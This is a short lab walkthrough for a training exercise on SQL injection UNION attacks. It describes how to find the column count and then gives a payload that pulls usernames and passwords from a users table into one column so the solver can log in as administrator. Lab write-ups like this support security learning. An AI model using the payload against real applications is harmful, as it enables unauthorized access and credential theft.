1.6 Lab: SQL injection UNION attack, retrieving multiple values in a single column | 2023

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables. The database contains a different table called users, with columns called username and password | Karthikeyan Nagaraj

Description

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution

1. Use the technique which we used in the previous lab to find the number of Columns
2. We found that there are 2 Columns, so we have to put a random string on each column separately.
3. Replace any String in the Place of NULL in the 1st column, if it throws an error, put that string on the next place of NULL.
4. Now we know that the second column contains the data
5. So, Paste the below query to retrieve all data from that particular column '+UNION+SELECT+NULL,username||'~'||password+FROM+users--

If you would like to support me so that I can create more free content — https://www.buymeacoffee.com/cyberw1ng

Thank you for Reading!

Happy Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng

Telegram Channel for Ethical Hacking Dumps — https://t.me/ethicalhackingessentials